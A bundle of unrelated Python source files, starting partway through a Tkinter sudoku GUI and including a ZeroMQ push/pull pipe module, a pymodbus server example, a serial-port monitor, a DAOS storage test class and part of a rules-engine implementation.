self.original_board[7] = [0, 0, 0, 0, 8, 0, 0, 3, 4]
self.original_board[8] = [9, 1, 0, 0, 0, 0, 0, 0, 6]
elif self.which == 2:
self.original_board[0] = [0, 0, 0, 0, 2, 0, 0, 0, 5]
self.original_board[1] = [0, 0, 1, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 7, 0, 0, 0, 8, 1]
self.original_board[3] = [0, 0, 0, 3, 0, 0, 5, 0, 0]
self.original_board[4] = [3, 0, 8, 5, 0, 6, 2, 0, 9]
self.original_board[5] = [0, 0, 4, 0, 0, 7, 0, 0, 0]
self.original_board[6] = [7, 4, 0, 0, 0, 9, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 0, 5, 9, 0, 0]
self.original_board[8] = [8, 0, 0, 0, 7, 0, 0, 0, 0]
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
def __draw_grid(self):
for i in range(10):
if i % 3 == 0:
color = "black"
else:
color = "gray"
x0 = MARGIN + i * SIDE
y0 = MARGIN
x1 = MARGIN + i * SIDE
y1 = HEIGHT_B - MARGIN
self.canvas.create_line(x0, y0, x1, y1, fill=color)
x0 = MARGIN
y0 = MARGIN + i * SIDE
x1 = WIDTH_B - MARGIN
y1 = MARGIN + i * SIDE
self.canvas.create_line(x0, y0, x1, y1, fill=color)
def __draw_puzzle(self):
self.canvas.delete("numbers")
self.time.set("Time: ")
self.n_bt.set("N. BT: ")
for i in range(9):
for j in range(9):
cell = self.current_board[i][j]
if cell != 0:
x = MARGIN + j * SIDE + SIDE / 2
y = MARGIN + i * SIDE + SIDE / 2
if str(cell) == str(self.original_board[i][j]):
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="black")
else:
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="red")
def __clear_board(self):
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
|
push_pipe.py
|
# -*- coding:utf8 -*-
# File : push_pipe.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 4/2/17
#
# This file is part of TensorArtist.
from . import configs, utils
from ...core.utils.meta import notnone_property
import zmq
import threading
import queue
import contextlib
import collections
import pickle
import functools
# import msgpack
# import msgpack_numpy
# msgpack_numpy.patch()
# dumpb = functools.partial(msgpack.dumps, use_bin_type=True)
# loadb = msgpack.loads
dumpb = pickle.dumps
loadb = pickle.loads
__all__ = ['PushPipe', 'PullPipe', 'make_push_pair']
class PullPipe(object):
def __init__(self, name, mode='tcp'):
self._name = name
self._mode = mode
self._conn_info = None
self._context = zmq.Context()
self._sock = self._context.socket(zmq.PULL)
self._sock.set_hwm(2)
@notnone_property
def conn_info(self):
return self._conn_info
def initialize(self):
if self._conn_info is not None:
return
if self._mode == 'tcp':
port = self._sock.bind_to_random_port('tcp://*')
self._conn_info = 'tcp://{}:{}'.format(utils.get_addr(), port)
elif self._mode == 'ipc':
self._conn_info = utils.bind_to_random_ipc(self._sock, self._name)
def finalize(self):
utils.graceful_close(self._sock)
self._context.term()
@contextlib.contextmanager
def activate(self):
self.initialize()
try:
yield
finally:
self.finalize()
def recv(self):
try:
return loadb(self._sock.recv(copy=False).bytes)
except zmq.ContextTerminated:
pass
class PushPipe(object):
def __init__(self, conn_info, send_qsize=10):
self._conn_info = conn_info
self._send_qsize = send_qsize
self._context = None
self._sock = None
self._send_queue = None
self._send_thread = None
def initialize(self):
self._context = zmq.Context()
self._sock = self._context.socket(zmq.PUSH)
self._sock.set_hwm(2)
self._sock.connect(self._conn_info)
self._send_queue = queue.Queue(maxsize=self._send_qsize)
self._send_thread = threading.Thread(target=self.mainloop_send, daemon=True)
self._send_thread.start()
def finalize(self):
utils.graceful_close(self._sock)
self._context.term()
@contextlib.contextmanager
def activate(self):
self.initialize()
try:
yield
finally:
self.finalize()
def mainloop_send(self):
try:
while True:
job = self._send_queue.get()
self._sock.send(dumpb(job), copy=False)
except zmq.ContextTerminated:
pass
def send(self, payload):
self._send_queue.put(payload)
return self
def make_push_pair(name, nr_workers=None, mode='tcp', send_qsize=10):
pull = PullPipe(name, mode=mode)
pull.initialize()
nr_pushs = nr_workers or 1
pushs = [PushPipe(pull.conn_info, send_qsize=send_qsize) for i in range(nr_pushs)]
if nr_workers is None:
return pull, pushs[0]
return pull, pushs
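# A rough usage sketch (single worker, same process; assumes the tcp helper in
# utils resolves a reachable local address):
#   pull, push = make_push_pair('demo-pipe')
#   with push.activate():
#       push.send({'step': 1})
#       print(pull.recv())  # -> {'step': 1}
#   pull.finalize()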
|
custom_datablock.py
|
#!/usr/bin/env python
"""
Pymodbus Server With Custom Datablock Side Effect
--------------------------------------------------------------------------
This is an example of performing custom logic after a value has been
written to the datastore.
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from __future__ import print_function
from pymodbus.version import version
from pymodbus.server.asynchronous import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# create your custom data block here
# --------------------------------------------------------------------------- #
class CustomDataBlock(ModbusSparseDataBlock):
""" A datablock that stores the new value in memory
and performs a custom action after it has been stored.
"""
def setValues(self, address, value):
""" Sets the requested values of the datastore
:param address: The starting address
:param value: The new values to be set
"""
super(CustomDataBlock, self).setValues(address, value)
# whatever you want to do with the written value is done here,
# however make sure not to do too much work here or it will
# block the server, especially if the server is being written
# to very quickly
print("wrote {} to {}".format(value, address))
def run_custom_db_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
block = CustomDataBlock([0]*100)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = version.short()
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
# p = Process(target=device_writer, args=(queue,))
# p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
if __name__ == "__main__":
run_custom_db_server()
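# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original example): the setValues side
# effect can be exercised from another process with the synchronous pymodbus
# TCP client; the register address and value below are illustrative only.
# ---------------------------------------------------------------------------
# from pymodbus.client.sync import ModbusTcpClient
# client = ModbusTcpClient("localhost", port=5020)
# client.write_register(0x10, 1234)   # triggers CustomDataBlock.setValues
# client.close()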
|
simplemonitor.py
|
import serial
import sys
from binascii import hexlify
import threading
def monitor(portname, outfile=sys.stdout, stop_evt=None):
data = b""
extra = b""
with serial.Serial(portname, 115200, timeout=0.01) as sp:
while True if stop_evt is None else not stop_evt.wait(0):
data += sp.read()
while len(data) > 8:
if(data[0] == 0x24 and
data[1] == 0x43 and
data[5] == 0x23):
if len(extra):
outfile.write("extra: %s " % hexlify(extra))
extra = b""
outfile.write(
"cmd: 0x%02x = 0x%04x\n" % (data[2], (data[3] << 8) + data[4]))
data = data[8:]
elif (data[0] == 0x2b and
data[3] == 0x23):
if len(extra):
outfile.write("extra: %s" % hexlify(extra))
extra = b""
outfile.write("rsp: 0x%04x\n" % ((data[1] << 8) + data[2]))
data = data[6:]
else:
extra += data[0:1]
data = data[1:]
def monitorfile(portname, filename, stop):
with open(filename, "w") as f:
monitor(portname, f, stop)
def monitorall(portnames=["/dev/ttyUSB0", "/dev/ttyUSB1", "/dev/ttyUSB2"],
filenames=["curl.txt", "lift.txt", "swing.txt"]):
ts = []
stop = threading.Event()
for pn, fn in zip(portnames, filenames):
ts.append(threading.Thread(target=monitorfile, args=(pn, fn, stop)))
for t in ts:
t.start()
def stopfn():
stop.set()
for t in ts:
t.join()
return stopfn
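# Hedged usage sketch (not part of the original script): monitorall() starts one
# logging thread per serial port and returns a function that stops them all.
# The default port and file names are defined above and may need adapting.
# stop = monitorall()   # log /dev/ttyUSB0..2 to curl.txt, lift.txt, swing.txt
# ...                   # run the experiment
# stop()                # set the stop event and join the monitor threads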
|
online_extend.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import threading
from test_utils_pool import add_pool
from write_host_file import write_host_file
from daos_racer_utils import DaosRacerCommand
from dmg_utils import check_system_query_status
from osa_utils import OSAUtils
from apricot import skipForTicket
from daos_utils import DaosCommand
class OSAOnlineExtend(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Extend test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
self.ranks = self.params.get("rank_list", '/run/test_ranks/*')
# Start an additional server.
self.extra_servers = self.params.get("test_servers",
"/run/extra_servers/*")
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
self.daos_racer = None
def daos_racer_thread(self):
"""Start the daos_racer thread."""
self.daos_racer = DaosRacerCommand(self.bin, self.hostlist_clients[0],
self.dmg_command)
self.daos_racer.get_params(self)
self.daos_racer.set_environment(
self.daos_racer.get_environment(self.server_managers[0]))
self.daos_racer.run()
def run_online_extend_test(self, num_pool, racer=False,
oclass=None, app_name="ior"):
"""Run the Online extend without data.
Args:
num_pool(int) : total pools to create for testing purposes.
racer(bool) : Run the testing along with daos_racer.
Defaults to False.
oclass(str) : Object Class (e.g., RP_2G1). Defaults to None.
app_name(str) : App (ior or mdtest) to run during the testing.
Defaults to ior.
"""
# Pool dictionary
pool = {}
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
# Start the daos_racer thread
if racer is True:
daos_racer_thread = threading.Thread(target=self.daos_racer_thread)
daos_racer_thread.start()
time.sleep(30)
for val in range(0, num_pool):
pool[val] = add_pool(self, connect=False)
pool[val].set_property("reclaim", "disabled")
# Extend the pool_uuid, rank and targets
for val in range(0, num_pool):
threads = []
self.pool = pool[val]
# Start the additional servers and extend the pool
self.log.info("Extra Servers = %s", self.extra_servers)
self.start_additional_servers(self.extra_servers)
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool)
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Make sure system map has all ranks in joined state.
for retry in range(0, 10):
scan_info = self.get_dmg_command().system_query()
if not check_system_query_status(scan_info):
if retry == 9:
self.fail("One or more servers not in expected status")
else:
break
# Launch the IOR or mdtest thread
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_extend(self.pool.uuid, self.ranks)
self.print_and_assert_on_rebuild_failure(output)
pver_extend = self.get_pool_version()
self.log.info("Pool Version after extend %s", pver_extend)
# Check that the pool version incremented after the pool extend
self.assertTrue(pver_extend > pver_begin,
"Pool Version Error: After extend")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
# Check data consistency for IOR in the future.
# Presently, daos_racer runs in parallel with IOR and data
# consistency is verified only for the daos_racer objects
# after the extend operation.
if racer is True:
daos_racer_thread.join()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool = pool[val]
self.pool.display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend(self):
"""Test ID: DAOS-4751
Test Description: Validate Online extend with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_csum
"""
self.log.info("Online Extend : With Checksum")
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_without_checksum(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend without checksum enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_without_csum
"""
self.log.info("Online Extend : Without Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_oclass(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with different
object class.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_oclass
"""
self.log.info("Online Extend : Oclass")
self.run_online_extend_test(1, oclass=self.test_oclass[0])
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_mdtest(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with mdtest application.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_mdtest
"""
self.log.info("Online Extend : Mdtest")
self.run_online_extend_test(1, app_name="mdtest")
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_with_aggregation(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with aggregation on.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_aggregation
"""
self.log.info("Online Extend : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_extend_test(1)
|
engine.py
|
import json
import copy
import rules
import threading
import inspect
import random
import time
import datetime
import os
import sys
import traceback
def _unix_now():
dt = datetime.datetime.now()
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
class Closure_Queue(object):
def __init__(self):
self._queued_posts = []
self._queued_asserts = []
self._queued_retracts = []
def get_queued_posts(self):
return self._queued_posts
def get_queued_asserts(self):
return self._queued_asserts
def get_queued_retracts(self):
return self._queued_retracts
def post(self, message):
if isinstance(message, Content):
message = message._d
self._queued_posts.append(message)
def assert_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_asserts.append(message)
def retract_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_retracts.append(message)
class Closure(object):
def __init__(self, host, state, message, handle, ruleset_name):
self.ruleset_name = ruleset_name
self.host = host
self.s = Content(state)
self._handle = handle
self._timer_directory = {}
self._cancelled_timer_directory = {}
self._message_directory = {}
self._queue_directory = {}
self._branch_directory = {}
self._fact_directory = {}
self._delete_directory = {}
self._retract_directory = {}
self._completed = False
self._deleted = False
self._start_time = _unix_now()
if isinstance(message, dict):
self._m = message
else:
self.m = []
for one_message in message:
if ('m' in one_message) and len(one_message) == 1:
one_message = one_message['m']
self.m.append(Content(one_message))
def get_timers(self):
return self._timer_directory
def get_cancelled_timers(self):
return self._cancelled_timer_directory
def get_branches(self):
return self._branch_directory
def get_messages(self):
return self._message_directory
def get_queues(self):
return self._queue_directory
def get_deletes(self):
return self._delete_directory
def get_facts(self):
return self._fact_directory
def get_retract_facts(self):
return self._retract_directory
def get_queue(self, ruleset_name):
if not ruleset_name in self._queue_directory:
self._queue_directory[ruleset_name] = Closure_Queue()
return self._queue_directory[ruleset_name]
def post(self, ruleset_name, message = None):
if not message:
message = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in message:
message['sid'] = self.s.sid
if isinstance(message, Content):
message = message._d
message_list = []
if ruleset_name in self._message_directory:
message_list = self._message_directory[ruleset_name]
else:
self._message_directory[ruleset_name] = message_list
message_list.append(message)
def delete(self, ruleset_name = None, sid = None):
if not ruleset_name:
ruleset_name = self.ruleset_name
if not sid:
sid = self.s.sid
if (ruleset_name == self.ruleset_name) and (sid == self.s.sid):
self._deleted = True
sid_list = []
if ruleset_name in self._delete_directory:
sid_list = self._delete_directory[ruleset_name]
else:
self._delete_directory[ruleset_name] = sid_list
sid_list.append(sid)
def start_timer(self, timer_name, duration, manual_reset = False):
if timer_name in self._timer_directory:
raise Exception('Timer with name {0} already added'.format(timer_name))
else:
timer = {'sid': self.s.sid, '$t': timer_name}
self._timer_directory[timer_name] = (timer, duration, manual_reset)
def cancel_timer(self, timer_name):
if timer_name in self._cancelled_timer_directory:
raise Exception('Timer with name {0} already cancelled'.format(timer_name))
else:
self._cancelled_timer_directory[timer_name] = True
def _retract_timer(self, timer_name, message):
if '$t' in message and message['$t'] == timer_name:
self.retract_fact(message)
return True
for property_name, property_value in message.items():
if isinstance(property_value, dict) and self._retract_timer(timer_name, property_value):
return True
return False
def reset_timer(self, timer_name):
if self._m:
return self._retract_timer(timer_name, self._m)
else:
for message in self.m:
if self._retract_timer(timer_name, message):
return True
return False
def assert_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
fact_list = []
if ruleset_name in self._fact_directory:
fact_list = self._fact_directory[ruleset_name]
else:
self._fact_directory[ruleset_name] = fact_list
fact_list.append(fact)
def retract_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
retract_list = []
if ruleset_name in self._retract_directory:
retract_list = self._retract_directory[ruleset_name]
else:
self._retract_directory[ruleset_name] = retract_list
retract_list.append(fact)
def renew_action_lease(self):
if _unix_now() - self._start_time < 10:
self._start_time = _unix_now()
self.host.renew_action_lease(self.ruleset_name, self.s.sid)
def _has_completed(self):
if _unix_now() - self._start_time > 10:
self._completed = True
value = self._completed
self._completed = True
return value
def _is_deleted(self):
return self._deleted
def __getattr__(self, name):
if name == '_m':
return None
if self._m and name in self._m:
return Content(self._m[name])
else:
return None
class Content(object):
def items(self):
return self._d.items()
def __init__(self, data):
self._d = data
def __getitem__(self, key):
if key in self._d:
data = self._d[key]
if isinstance(data, dict):
data = Content(data)
return data
else:
return None
def __setitem__(self, key, value):
if value is None:
del self._d[key]
elif isinstance(value, Content):
self._d[key] = value._d
else:
self._d[key] = value
def __iter__(self):
return iter(self._d)
def __contains__(self, key):
return key in self._d
def __getattr__(self, name):
return self.__getitem__(name)
def __setattr__(self, name, value):
if name == '_d':
self.__dict__['_d'] = value
else:
self.__setitem__(name, value)
def __repr__(self):
return repr(self._d)
def __str__(self):
return str(self._d)
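# Illustrative sketch (not part of the original module): Content wraps a dict so
# rule actions can use attribute access; nested dicts are wrapped lazily and
# missing keys read as None instead of raising.
# c = Content({'sid': 1, 'payload': {'amount': 250}})
# c.payload.amount      # -> 250, nested dict re-wrapped as Content
# c.missing             # -> None rather than AttributeError/KeyError
# c.status = 'done'     # writes through to the underlying dict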
class Promise(object):
def __init__(self, func):
self._func = func
self._next = None
self._sync = True
self._timer = None
self.root = self
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count == 2:
self._sync = False
elif arg_count != 1:
raise Exception('Invalid function signature')
def continue_with(self, next):
if (isinstance(next, Promise)):
self._next = next
elif (hasattr(next, '__call__')):
self._next = Promise(next)
else:
raise Exception('Unexpected Promise Type')
self._next.root = self.root
return self._next
def run(self, c, complete):
def timeout(max_time):
if _unix_now() > max_time:
c.s.exception = 'timeout expired'
complete(None)
else:
c.renew_action_lease()
self._timer = threading.Timer(5, timeout, (max_time, ))
self._timer.daemon = True
self._timer.start()
if self._sync:
try:
self._func(c)
except BaseException as error:
c.s.exception = 'exception caught {0}'.format(str(error))
except:
c.s.exception = 'unknown exception'
if self._next:
self._next.run(c, complete)
else:
complete(None)
else:
try:
def callback(e):
if self._timer:
self._timer.cancel()
self._timer = None
if e:
c.s.exception = str(e)
if self._next:
self._next.run(c, complete)
else:
complete(None)
time_left = self._func(c, callback)
if time_left:
self._timer = threading.Timer(5, timeout, (_unix_now() + time_left, ))
self._timer.daemon = True
self._timer.start()
except BaseException as error:
c.s.exception = 'exception caught {0}'.format(str(error))
complete(None)
except:
c.s.exception = 'unknown exception'
complete(None)
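# Illustrative sketch (not part of the original module): Promise decides between
# synchronous and asynchronous execution purely by the action's arity, so both
# styles can be chained; the action names below are hypothetical.
# def approve(c):              # one argument  -> run synchronously
#     c.s.status = 'approved'
# def notify(c, complete):     # two arguments -> run asynchronously
#     complete(None)           # report completion (or pass an error)
# Promise(approve).continue_with(notify)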
class To(Promise):
def __init__(self, from_state, to_state, assert_state):
super(To, self).__init__(self._execute)
self._from_state = from_state
self._to_state = to_state
self._assert_state = assert_state
def _execute(self, c):
c.s.running = True
if self._from_state != self._to_state:
if self._from_state:
if c.m and isinstance(c.m, list):
c.retract_fact(c.m[0].chart_context)
else:
c.retract_fact(c.chart_context)
if self._assert_state:
c.assert_fact({ 'label': self._to_state, 'chart': 1 })
else:
c.post({ 'label': self._to_state, 'chart': 1 })
class Ruleset(object):
def __init__(self, name, host, ruleset_definition, state_cache_size):
self._actions = {}
self._name = name
self._host = host
for rule_name, rule in ruleset_definition.items():
action = rule['run']
del rule['run']
if isinstance(action, str):
self._actions[rule_name] = Promise(host.get_action(action))
elif isinstance(action, Promise):
self._actions[rule_name] = action.root
elif (hasattr(action, '__call__')):
self._actions[rule_name] = Promise(action)
self._handle = rules.create_ruleset(state_cache_size, name, json.dumps(ruleset_definition, ensure_ascii=False))
self._definition = ruleset_definition
def bind(self, databases):
for db in databases:
if isinstance(db, str):
rules.bind_ruleset(0, 0, db, None, self._handle)
else:
if not 'password' in db:
db['password'] = None
if not 'db' in db:
db['db'] = 0
rules.bind_ruleset(db['port'], db['db'], db['host'], db['password'], self._handle)
def assert_event(self, message):
return rules.assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def queue_assert_event(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_event(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_event(self, message):
return rules.start_assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def assert_events(self, messages):
return rules.assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def start_assert_events(self, messages):
return rules.start_assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def assert_fact(self, fact):
return rules.assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_assert_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_fact(self, fact):
return rules.start_assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def assert_facts(self, facts):
return rules.assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_assert_facts(self, facts):
return rules.start_assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def retract_fact(self, fact):
return rules.retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_retract_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_retract_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_retract_fact(self, fact):
return rules.start_retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def retract_facts(self, facts):
return rules.retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_retract_facts(self, facts):
return rules.start_retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_timer(self, sid, timer, timer_duration, manual_reset):
if sid != None:
sid = str(sid)
rules.start_timer(self._handle, timer_duration, manual_reset, json.dumps(timer, ensure_ascii=False), sid)
def cancel_timer(self, sid, timer_name):
if sid != None:
sid = str(sid)
rules.cancel_timer(self._handle, sid, timer_name)
def assert_state(self, state):
if 'sid' in state:
return rules.assert_state(self._handle, str(state['sid']), json.dumps(state, ensure_ascii=False))
else:
return rules.assert_state(self._handle, None, json.dumps(state, ensure_ascii=False))
def get_state(self, sid):
if sid != None:
sid = str(sid)
return json.loads(rules.get_state(self._handle, sid))
def delete_state(self, sid):
if sid != None:
sid = str(sid)
rules.delete_state(self._handle, sid)
def renew_action_lease(self, sid):
if sid != None:
sid = str(sid)
rules.renew_action_lease(self._handle, sid)
def get_definition(self):
return self._definition
@staticmethod
def create_rulesets(parent_name, host, ruleset_definitions, state_cache_size):
branches = {}
for name, definition in ruleset_definitions.items():
if name.rfind('$state') != -1:
name = name[:name.rfind('$state')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Statechart(name, host, definition, state_cache_size)
elif name.rfind('$flow') != -1:
name = name[:name.rfind('$flow')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Flowchart(name, host, definition, state_cache_size)
else:
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Ruleset(name, host, definition, state_cache_size)
return branches
def dispatch_timers(self, complete):
try:
if not rules.assert_timers(self._handle):
complete(None, True)
else:
complete(None, False)
except Exception as error:
complete(error, True)
return
def dispatch(self, complete, async_result = None):
state = None
action_handle = None
action_binding = None
result_container = {}
if async_result:
state = async_result[0]
result_container = {'message': json.loads(async_result[1])}
action_handle = async_result[2]
action_binding = async_result[3]
else:
try:
result = rules.start_action(self._handle)
if not result:
complete(None, True)
return
else:
state = json.loads(result[0])
result_container = {'message': json.loads(result[1])}
action_handle = result[2]
action_binding = result[3]
except BaseException as error:
t, v, tb = sys.exc_info()
print('start action base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete(error, True)
return
except:
t, v, tb = sys.exc_info()
print('start action unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete('unknown error', True)
return
while 'message' in result_container:
action_name = None
for action_name, message in result_container['message'].items():
break
del(result_container['message'])
c = Closure(self._host, state, message, action_handle, self._name)
def action_callback(e):
if c._has_completed():
return
if e:
rules.abandon_action(self._handle, c._handle)
complete(e, True)
else:
try:
for timer_name, timer in c.get_cancelled_timers().items():
self.cancel_timer(c.s['sid'], timer_name)
for timer_id, timer_tuple in c.get_timers().items():
self.start_timer(c.s['sid'], timer_tuple[0], timer_tuple[1], timer_tuple[2])
for ruleset_name, q in c.get_queues().items():
for message in q.get_queued_posts():
self.queue_assert_event(message['sid'], ruleset_name, message)
for message in q.get_queued_asserts():
self.queue_assert_fact(message['sid'], ruleset_name, message)
for message in q.get_queued_retracts():
self.queue_retract_fact(message['sid'], ruleset_name, message)
for ruleset_name, sid in c.get_deletes().items():
self._host.delete_state(ruleset_name, sid)
binding = 0
replies = 0
pending = {action_binding: 0}
for ruleset_name, facts in c.get_retract_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_retract_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_retract_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, facts in c.get_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_assert_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_assert_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, messages in c.get_messages().items():
if len(messages) == 1:
binding, replies = self._host.start_post(ruleset_name, messages[0])
else:
binding, replies = self._host.start_post_batch(ruleset_name, messages)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
binding, replies = rules.start_update_state(self._handle, c._handle, json.dumps(c.s._d, ensure_ascii=False))
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for binding, replies in pending.items():
if binding != 0:
if binding != action_binding:
rules.complete(binding, replies)
else:
new_result = rules.complete_and_start_action(self._handle, replies, c._handle)
if new_result:
if 'async' in result_container:
def terminal(e, wait):
return
self.dispatch(terminal, [state, new_result, action_handle, action_binding])
else:
result_container['message'] = json.loads(new_result)
except BaseException as error:
t, v, tb = sys.exc_info()
print('base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete(error, True)
except:
t, v, tb = sys.exc_info()
print('unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete('unknown error', True)
if c._is_deleted():
try:
self.delete_state(c.s.sid)
except BaseException as error:
complete(error, True)
if 'async' in result_container:
del result_container['async']
self._actions[action_name].run(c, action_callback)
result_container['async'] = True
complete(None, False)
class Statechart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(None, None, None, chart_definition, ruleset_definition)
super(Statechart, self).__init__(name, host, ruleset_definition, state_cache_size)
